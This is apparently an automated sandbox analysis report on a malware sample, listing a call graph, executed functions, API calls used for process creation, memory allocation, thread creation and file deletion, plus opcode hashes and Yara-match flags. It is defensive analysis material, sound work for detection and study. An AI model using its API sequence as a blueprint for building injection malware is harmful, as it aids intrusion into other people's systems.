96252->96251 96253 32270c2 96252->96253 96255 322ac80 96252->96255 96253->96250 96256 322aca6 96255->96256 96257 322aec5 96256->96257 96282 32384e0 96256->96282 96257->96253 96259 322ad1c 96259->96257 96285 323b1e0 96259->96285 96261 322ad38 96261->96257 96262 322ae09 96261->96262 96291 3237790 96261->96291 96264 3225710 LdrInitializeThunk 96262->96264 96266 322ae28 96262->96266 96264->96266 96281 322aead 96266->96281 96302 3237360 96266->96302 96268 322ad9d 96268->96257 96274 322adf1 96268->96274 96276 322adcf 96268->96276 96295 3225710 96268->96295 96270 3227be0 LdrInitializeThunk 96275 322aebb 96270->96275 96298 3227be0 96274->96298 96275->96253 96317 3233930 LdrInitializeThunk 96276->96317 96277 322ae84 96307 3237400 96277->96307 96279 322ae9e 96312 3237540 96279->96312 96281->96270 96283 32384fd 96282->96283 96284 323850e CreateProcessInternalW 96283->96284 96284->96259 96286 323b150 96285->96286 96287 323b1ad 96286->96287 96288 323a0b0 RtlAllocateHeap 96286->96288 96287->96261 96289 323b18a 96288->96289 96290 3239fd0 RtlFreeHeap 96289->96290 96290->96287 96292 32377aa 96291->96292 96318 3a22c0a 96292->96318 96293 322ad94 96293->96262 96293->96268 96296 3237950 LdrInitializeThunk 96295->96296 96297 322574e 96296->96297 96297->96276 96299 3227bf3 96298->96299 96321 32376a0 96299->96321 96301 3227c1e 96301->96253 96303 32373d2 96302->96303 96305 3237384 96302->96305 96327 3a239b0 LdrInitializeThunk 96303->96327 96304 32373f7 96304->96277 96305->96277 96308 3237472 96307->96308 96309 3237424 96307->96309 96328 3a24340 LdrInitializeThunk 96308->96328 96309->96279 96310 3237497 96310->96279 96313 32375af 96312->96313 96315 3237561 96312->96315 96329 3a22fb0 LdrInitializeThunk 96313->96329 96314 32375d4 96314->96281 96315->96281 96317->96274 96319 3a22c11 96318->96319 96320 3a22c1f LdrInitializeThunk 96318->96320 96319->96293 96320->96293 96322 32376c1 96321->96322 96323 3237710 96321->96323 96322->96301 96326 3a22dd0 LdrInitializeThunk 96323->96326 96324 3237735 96324->96301 96326->96324 96327->96304 96328->96310 96329->96314 96330 32350f0 96331 323514a 96330->96331 96333 3235157 96331->96333 96334 3232c60 96331->96334 96335 3239f40 NtAllocateVirtualMemory 96334->96335 96336 3232ca1 96335->96336 96337 32244e0 2 API calls 96336->96337 96339 3232da6 96336->96339 96340 3232ce7 96337->96340 96338 3232d20 Sleep 96338->96340 96339->96333 96340->96338 96340->96339 96341 32258b6 96342 322583d 96341->96342 96347 32258bd 96341->96347 96343 3225856 96342->96343 96344 3237790 LdrInitializeThunk 96342->96344 96348 3238180 96343->96348 96344->96343 96346 322586b 96349 3238201 96348->96349 96350 32381a1 96348->96350 96353 3a22e80 LdrInitializeThunk 96349->96353 96350->96346 96351 3238232 96351->96346 96353->96351 96354 3219736 96355 32196f0 96354->96355 96358 3219739 96354->96358 96356 3219730 96355->96356 96357 321971d CreateThread 96355->96357 96360 321a0a9 96358->96360 96361 3239c70 96358->96361 96362 3239c93 96361->96362 96367 3214090 96362->96367 96364 3239c9f 96365 3239ccd 96364->96365 96370 3234730 96364->96370 96365->96360 96374 3223210 96367->96374 96369 321409d 96369->96364 96371 323478a 96370->96371 96373 3234797 96371->96373 96385 32216c0 96371->96385 96373->96365 96375 3223227 96374->96375 96377 3223240 96375->96377 96378 3238b30 96375->96378 96377->96369 96380 3238b48 96378->96380 96379 3238b6c 96379->96377 96380->96379 96381 3237790 LdrInitializeThunk 96380->96381 96382 3238bc1 96381->96382 96383 3239fd0 RtlFreeHeap 96382->96383 96384 3238bda 96383->96384 96384->96377 96386 32216fb 96385->96386 96401 3227970 96386->96401 96388 3221703 96389 323a0b0 RtlAllocateHeap 96388->96389 96399 32219cf 96388->96399 96390 3221719 96389->96390 96391 323a0b0 RtlAllocateHeap 96390->96391 96392 322172a 96391->96392 96393 323a0b0 RtlAllocateHeap 96392->96393 96394 322173b 96393->96394 96400 32217ce 96394->96400 96416 3226760 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96394->96416 96396 32244e0 2 API calls 96397 322198f 96396->96397 96412 3236e50 96397->96412 96399->96373 96400->96396 96402 322799c 96401->96402 96417 3227860 96402->96417 96405 32279e1 96408 32279fd 96405->96408 96410 32380f0 NtClose 96405->96410 96406 32279c9 96407 32279d4 96406->96407 96409 32380f0 NtClose 96406->96409 96407->96388 96408->96388 96409->96407 96411 32279f3 96410->96411 96411->96388 96413 3236eaa 96412->96413 96414 3236eb7 96413->96414 96428 32219e0 96413->96428 96414->96399 96416->96400 96418 322787a 96417->96418 96422 3227956 96417->96422 96423 3237830 96418->96423 96421 32380f0 NtClose 96421->96422 96422->96405 96422->96406 96424 323784a 96423->96424 96427 3a235c0 LdrInitializeThunk 96424->96427 96425 322794a 96425->96421 96427->96425 96446 3227c40 96428->96446 96430 3221a00 96431 3221ee5 96430->96431 96450 32308a0 96430->96450 96431->96414 96434 3221be5 96457 323b0b0 96434->96457 96436 3221c01 96438 323b1e0 2 API calls 96436->96438 96437 3221a5e 96437->96431 96453 3236dc0 96437->96453 96440 3221c16 96438->96440 96439 3227be0 LdrInitializeThunk 96442 3221c41 96439->96442 96440->96442 96462 3220680 96440->96462 96442->96431 96442->96439 96444 3220680 LdrInitializeThunk 96442->96444 96443 3227be0 LdrInitializeThunk 96445 3221d6f 96443->96445 96444->96442 96445->96442 96445->96443 96447 3227c4d 96446->96447 96448 3227c75 96447->96448 96449 3227c6e SetErrorMode 96447->96449 96448->96430 96449->96448 96451 3239f40 NtAllocateVirtualMemory 96450->96451 96452 32308c1 96451->96452 96452->96437 96454 3236e1a 96453->96454 96455 3236e2f 96454->96455 96465 3221f00 96454->96465 96455->96434 96458 323b0c0 96457->96458 96459 323b0c6 96457->96459 96458->96436 96460 323a0b0 RtlAllocateHeap 96459->96460 96461 323b0ec 96460->96461 96461->96436 96463 32206a2 96462->96463 96470 3238360 96462->96470 96463->96445 96467 3221ee5 96465->96467 96468 3221df2 96465->96468 96466 3227be0 LdrInitializeThunk 96466->96468 96467->96455 96468->96465 96468->96466 96468->96467 96469 3220680 LdrInitializeThunk 96468->96469 96469->96468 96471 323837d 96470->96471 96474 3a22c70 LdrInitializeThunk 96471->96474 96472 32383a5 96472->96463 96474->96472 96475 32282be 96476 32282c3 96475->96476 96478 3228282 96476->96478 96479 3226cd0 LdrInitializeThunk LdrInitializeThunk 96476->96479 96479->96478 96480 3220b00 96481 3220b1a 96480->96481 96482 32244e0 2 API calls 96481->96482 96483 3220b38 96482->96483 96484 3220b7d 96483->96484 96485 3220b6c PostThreadMessageW 96483->96485 96485->96484 96486 322f000 96487 322f064 96486->96487 96517 3226000 96487->96517 96489 322f194 96490 322f18d 96490->96489 96524 3226110 96490->96524 96493 322f333 96494 3235e80 RtlFreeHeap 96495 322f22d 96494->96495 96496 322f342 96495->96496 96528 322ede0 96495->96528 96497 32380f0 NtClose 96496->96497 96499 322f34c 96497->96499 96500 322f245 96500->96496 96501 322f250 96500->96501 96502 323a0b0 RtlAllocateHeap 96501->96502 96503 322f279 96502->96503 96504 322f282 96503->96504 96505 322f298 96503->96505 96506 32380f0 NtClose 96504->96506 96537 322ecd0 CoInitialize 96505->96537 96508 322f28c 96506->96508 96509 322f2a6 96539 3237be0 96509->96539 96511 322f322 96512 32380f0 NtClose 96511->96512 96513 322f32c 96512->96513 96514 3239fd0 RtlFreeHeap 96513->96514 96514->96493 96515 322f2c4 96515->96511 96516 3237be0 LdrInitializeThunk 96515->96516 96516->96515 96518 3226033 96517->96518 96519 3226057 96518->96519 96543 3237c90 96518->96543 96519->96490 96521 322607a 96521->96519 96522 32380f0 NtClose 96521->96522 96523 32260fa 96522->96523 96523->96490 96525 3226135 96524->96525 96548 3237a80 96525->96548 96529 322edfc 96528->96529 96530 32244e0 2 API calls 96529->96530 96532 322ee1a 96530->96532 96531 322ee23 96531->96500 96532->96531 96533 32244e0 2 API calls 96532->96533 96534 322eeee 96533->96534 96535 32244e0 2 API calls 96534->96535 96536 322ef48 96534->96536 96535->96536 96536->96500 96538 322ed35 96537->96538 96538->96509 96540 3237bfd 96539->96540 96553 3a22ba0 LdrInitializeThunk 96540->96553 96541 3237c2d 96541->96515 96544 3237cad 96543->96544 96547 3a22ca0 LdrInitializeThunk 96544->96547 96545 3237cd9 96545->96521 96547->96545 96549 3237a9d 96548->96549 96552 3a22c60 LdrInitializeThunk 96549->96552 96550 32261a9 96550->96493 96550->96494 96552->96550 96553->96541 96554 3226e80 96555 3226eef 96554->96555 96556 3226e9c 96554->96556 96563 3227018 96555->96563 96565 3226290 NtClose LdrInitializeThunk LdrInitializeThunk 96555->96565 96556->96555 96557 32380f0 NtClose 96556->96557 96558 3226eb7 96557->96558 96564 3226290 NtClose LdrInitializeThunk LdrInitializeThunk 96558->96564 96560 3226ff2 96560->96563 96566 3226460 NtClose LdrInitializeThunk LdrInitializeThunk 96560->96566 96564->96555 96565->96560 96566->96563 96567 3237740 96568 323775d 96567->96568 96571 3a22df0 LdrInitializeThunk 96568->96571 96569 3237785 96571->96569 96572 3237f80 96573 3238019 96572->96573 96575 3237fa1 96572->96575 96574 323802f NtReadFile 96573->96574 96581 3222787 96582 32227a8 96581->96582 96583 3226000 2 API calls 96582->96583 96584 32227b3 96583->96584 96585 322310c 96586 3227860 2 API calls 96585->96586 96587 322311c 96586->96587 96588 32380f0 NtClose 96587->96588 96589 3223131 96587->96589 96588->96589 96590 3225790 96591 3227be0 LdrInitializeThunk 96590->96591 96592 32257c0 96591->96592 96594 32257ec 96592->96594 96595 3227b60 96592->96595 96596 3227ba4 96595->96596 96597 3227bc5 96596->96597 96602 32374a0 96596->96602 96597->96592 96599 3227bb5 96600 3227bd1 96599->96600 96601 32380f0 NtClose 96599->96601 96600->96592 96601->96597 96603 323750f 96602->96603 96605 32374c1 96602->96605 96607 3a24650 LdrInitializeThunk 96603->96607 96604 3237534 96604->96599 96605->96599 96607->96604 96608 3a22ad0 LdrInitializeThunk 96609 3227050 96610 32270c2 96609->96610 96611 3227068 96609->96611 96611->96610 96612 322ac80 9 API calls 96611->96612 96612->96610 96613 323b110 96614 3239fd0 RtlFreeHeap 96613->96614 96615 323b125 96614->96615 96616 322969b 96617 32296aa 96616->96617 96618 32296b1 96617->96618 96619 3239fd0 RtlFreeHeap 96617->96619 96619->96618

                            Executed Functions

                            Function 03219740 Relevance: 44.3, Strings: 35, Instructions: 506COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 154 3219740-3219c0b 155 3219c15-3219c1c 154->155 156 3219c43-3219c54 155->156 157 3219c1e-3219c41 155->157 158 3219c65-3219c71 156->158 157->155 159 3219c73-3219c86 158->159 160 3219c88-3219c8c 158->160 159->158 161 3219cad-3219cb9 160->161 162 3219c8e-3219cab 160->162 164 3219cbb-3219cdc 161->164 165 3219cde-3219cef 161->165 162->160 164->161 166 3219d00-3219d07 165->166 167 3219d09-3219d1a 166->167 168 3219d1c 166->168 167->166 170 3219d23-3219d2f 168->170 171 3219d31-3219d52 170->171 172 3219d54-3219d5d 170->172 171->170 173 3219fa0-3219faa 172->173 174 3219d63-3219d6d 172->174 175 3219fbb-3219fc7 173->175 176 3219d7e-3219d8a 174->176 177 3219fd7-3219fe1 175->177 178 3219fc9-3219fd5 175->178 179 3219da0-3219daa 176->179 180 3219d8c-3219d9e 176->180 183 3219fe3-321a002 177->183 184 321a015-321a01c 177->184 178->175 181 3219dbb-3219dc7 179->181 180->176 186 3219dc9-3219dd2 181->186 187 3219ddf-3219def 181->187 188 321a013 183->188 189 321a004-321a00d 183->189 190 321a022-321a02c 184->190 191 321a229-321a230 184->191 194 3219dd4-3219dd7 186->194 195 3219ddd 186->195 196 3219dfa-3219e01 187->196 188->177 189->188 197 321a03d-321a049 190->197 192 321a262-321a26b 191->192 193 321a232-321a260 191->193 193->191 194->195 195->181 201 3219e03-3219e2a 196->201 202 3219e2c-3219e33 196->202 198 321a059-321a070 197->198 199 321a04b-321a057 197->199 204 321a081-321a08d 198->204 199->197 201->196 206 3219e35-3219e58 202->206 207 3219e5a-3219e69 202->207 208 321a0a4 call 3239c70 204->208 209 321a08f-321a0a2 204->209 206->202 210 3219e6b-3219e75 207->210 211 3219eaf-3219eb9 207->211 218 321a0a9-321a0b0 208->218 213 321a072-321a07b 209->213 215 3219e86-3219e92 210->215 212 3219eca-3219ed6 211->212 216 3219ed8-3219eea 212->216 217 3219eec-3219ef6 212->217 213->204 219 3219e94-3219e9d 215->219 220 3219eaa 215->220 216->212 224 3219f07-3219f13 217->224 225 321a0b2-321a0d5 218->225 226 321a0d7-321a0e1 218->226 221 3219ea8 219->221 222 3219e9f-3219ea2 219->222 220->173 221->215 222->221 228 3219f15-3219f28 224->228 229 3219f2a-3219f30 224->229 225->218 230 321a0f2-321a0fe 226->230 228->224 232 3219f34-3219f3b 229->232 233 321a100-321a112 230->233 234 321a114-321a11e 230->234 235 3219f62-3219f6c 232->235 236 3219f3d-3219f60 232->236 233->230 238 321a12f-321a13b 234->238 241 3219f7d-3219f89 235->241 236->232 239 321a151-321a155 238->239 240 321a13d-321a14f 238->240 245 321a157-321a17c 239->245 246 321a17e-321a188 239->246 240->238 242 3219f9b 241->242 243 3219f8b-3219f91 241->243 242->172 247 3219f93-3219f96 243->247 248 3219f99 243->248 245->239 249 321a199-321a1a0 246->249 247->248 248->241 251 321a1a2-321a1c7 249->251 252 321a1c9-321a1e2 249->252 251->249 252->252 254 321a1e4-321a1ee 252->254 255 321a1ff-321a20b 254->255 255->191 256 321a20d-321a219 255->256 257 321a227 256->257 258 321a21b-321a221 256->258 257->255 258->257
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "*$#$$$)$*O$3E$4$5$6$8$C$I$KF$Kv$L#$LL$R*$RC$T$Y$a$c$c%$d$hd$l$m$y(${$|$)$D$Y$Y$b
                            • API String ID: 0-444417252
                            • Opcode ID: 14747e5b4fe2305507aff1bb627401417b2b92258512f82c6a40be54baf92688
                            • Instruction ID: f140a483972f2bdc52d88f6b01d7e5b6d8c509de0164fcec650cdb017e8f5e60
                            • Opcode Fuzzy Hash: 14747e5b4fe2305507aff1bb627401417b2b92258512f82c6a40be54baf92688
                            • Instruction Fuzzy Hash: 8F529DB0D15229CBEB65CF44C998BDDBBB1BB69308F1081D9D04D6B280C7B95AD9CF84
                            Function 0322BF20 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0322C004
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0322C03F
                            • FindClose.KERNELBASE(?), ref: 0322C04A
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: 2ec34cec3e2b193c6b078985cb0229c521994dbb78ba7706fda8460e581adf65
                            • Instruction ID: 14343015dfeb08afcdbcfdb769799dbd208ff8228098ef0d4ad76536de0fd14c
                            • Opcode Fuzzy Hash: 2ec34cec3e2b193c6b078985cb0229c521994dbb78ba7706fda8460e581adf65
                            • Instruction Fuzzy Hash: 2631B2B5910318BBDB20DF64CC85FFF777C9B45704F144598BA08AB180EAB1ABD48BA1
                            Function 03237E20 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03237F13
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ad6615fc420d2807dfd7382b17cb3b391eed67d17bf06f0a23172501b6ccef4a
                            • Instruction ID: 0020577ecc2656b3077370ba459f52022714f7ce32fc2ce39251b2ad7e5d0cd5
                            • Opcode Fuzzy Hash: ad6615fc420d2807dfd7382b17cb3b391eed67d17bf06f0a23172501b6ccef4a
                            • Instruction Fuzzy Hash: 4731D5B5A11209AFDB14DF98D880EDEBBF9AF8D710F108219FD19A7340D770A851CBA4
                            Function 03237F80 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03238058
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 5c7df527062c3008284fc9738dfa9e5924ad65c566b732b5d860a3d882a059aa
                            • Instruction ID: 8bf6711b231fcd3c5ccfd3dcae3274dc5a191b41fa0b99919cdffc746f42c5f1
                            • Opcode Fuzzy Hash: 5c7df527062c3008284fc9738dfa9e5924ad65c566b732b5d860a3d882a059aa
                            • Instruction Fuzzy Hash: 613109B5A10208AFDB14DF59D880EEFBBF9EF8D714F00850AFD18A7240D770A8518BA0
                            Function 03238240 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(03221A5E,?,03236EB7,00000000,00000004,00003000,?,?,?,?,?,03236EB7,03221A5E,6A574B00,03221A5E,00000000), ref: 032382FD
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: f44f9738fdc4b9d936bb10f860b662b84d53457bdfbc1d8c96dad4ca9a68d16b
                            • Instruction ID: b6c955d7d7c627216fce4804efae08bdc1257cd76b2065bd2d5812152afc8a6e
                            • Opcode Fuzzy Hash: f44f9738fdc4b9d936bb10f860b662b84d53457bdfbc1d8c96dad4ca9a68d16b
                            • Instruction Fuzzy Hash: C1214CB5A10209AFDB14DF58DC41FEFB7B9EF89610F008609FD58AB280D771A851CBA1
                            Function 03238060 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 11925e15ac0903aa953dd580597b0c34f2ceeeb38f974c24de6dd8b2c9a8329d
                            • Instruction ID: e23cb11007d6a9068b468323e25134923086da7cc4b11a486ef239868a8c0ce8
                            • Opcode Fuzzy Hash: 11925e15ac0903aa953dd580597b0c34f2ceeeb38f974c24de6dd8b2c9a8329d
                            • Instruction Fuzzy Hash: D401C0B5A503047BE210EA64DC41FEB77ACDF86610F40844AFA48AB280D7B1B85187E1
                            Function 032380F0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03238127
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction ID: 876977c4bf2ee690376ca808067fac49f21ba27ef53a399e8b0965e8deb83bf8
                            • Opcode Fuzzy Hash: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction Fuzzy Hash: F0E04F752112047BD510EB59DC40F97776CDBC6A10F404055FA19AB281C6B1B95186B4
                            Function 03A24340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8f37b60601faf41121e428c18f6cdd4092f3b83b4c46b66bb0ac8d55610b7ca0
                            • Instruction ID: b497c409b39782c0c19cf7802a80b108871449dbb0253d0b113d08cc571181a2
                            • Opcode Fuzzy Hash: 8f37b60601faf41121e428c18f6cdd4092f3b83b4c46b66bb0ac8d55610b7ca0
                            • Instruction Fuzzy Hash: F8900231A05804129140B1584884546401997E1301B56C012F0428554C8B188A5A6371
                            Function 03A24650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: edb45978262d225a0c5d4b2aadedfd78e977c2aed279cd991bff93c32c6b5d65
                            • Instruction ID: f66067b2182446210a61d9ed390abb43ef1cd689c684c7186d28ebad516ed9f8
                            • Opcode Fuzzy Hash: edb45978262d225a0c5d4b2aadedfd78e977c2aed279cd991bff93c32c6b5d65
                            • Instruction Fuzzy Hash: 39900261A01504424140B1584804406601997E2301396C116B0558560C871C8959A279
                            Function 03A22BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 15f35391fcf561de47c55f622243b0d1f4bb1942c5d7345c8d7a88bad2c21294
                            • Instruction ID: 24881a29ead5a13114bdf551a84035183a3f2acd90eddc38ed46b2c82a76fa7f
                            • Opcode Fuzzy Hash: 15f35391fcf561de47c55f622243b0d1f4bb1942c5d7345c8d7a88bad2c21294
                            • Instruction Fuzzy Hash: BE900231A0540C02D150B1584414746001987D1301F56C012B0028654D87598B5976B1
                            Function 03A22BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6f57e6e67560088ad8b3a3a5f99fca127875999f7363c03df0d7153c4acf4b87
                            • Instruction ID: 7701bc1a3e215b71177663ae56287bae2a7922e2ba70ed54aac5bb21b7dbf978
                            • Opcode Fuzzy Hash: 6f57e6e67560088ad8b3a3a5f99fca127875999f7363c03df0d7153c4acf4b87
                            • Instruction Fuzzy Hash: C890023160544C42D140B1584404A46002987D1305F56C012B0068694D97298E59B671
                            Function 03A22BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 05ac0543c306b2fec8b3c72c86b704cd1773f6d26f7f5636d0425003b9e62a2d
                            • Instruction ID: 32dc9267c1cee1464dd8fbea7a557ad15c6917cc899b8f9eb6ce4719d1d9ac38
                            • Opcode Fuzzy Hash: 05ac0543c306b2fec8b3c72c86b704cd1773f6d26f7f5636d0425003b9e62a2d
                            • Instruction Fuzzy Hash: 2190023160140C02D180B158440464A001987D2301F96C016B0029654DCB198B5D77B1
                            Function 03A22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 870353428f7de623ee15902dd136890b31be6e14333508a863d11f711c8103ba
                            • Instruction ID: b5448d2f2b480e41a9d867b7de8c4df2d3990aa48037fed9707e442c153ce833
                            • Opcode Fuzzy Hash: 870353428f7de623ee15902dd136890b31be6e14333508a863d11f711c8103ba
                            • Instruction Fuzzy Hash: D4900261602404034105B1584414616401E87E1301B56C022F1018590DC62989957135
                            Function 03A22AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: dfb0aec2f8f902ed3a1a36a1c2f6e54efc5a375ab4716eaa8f80eb97c586743c
                            • Instruction ID: 04d7cde4cc09291f46f515cd9db9b851eae8f948b928ba83208d9eeb6b41a77c
                            • Opcode Fuzzy Hash: dfb0aec2f8f902ed3a1a36a1c2f6e54efc5a375ab4716eaa8f80eb97c586743c
                            • Instruction Fuzzy Hash: 48900225621404020145F558060450B045997D7351396C016F141A590CC72589696331
